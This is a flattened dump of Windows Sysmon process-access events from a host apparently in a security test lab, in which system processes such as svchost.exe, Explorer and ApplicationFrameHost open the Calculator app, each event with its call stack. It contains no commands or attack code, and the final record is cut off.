10341000x8000000000000000362225Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362224Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362223Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362222Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000362221Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362220Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362219Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362218Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362217Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000362216Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362215Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362214Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362213Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362212Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362211Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362210Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362209Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362208Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362207Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362206Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362205Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362204Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362203Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 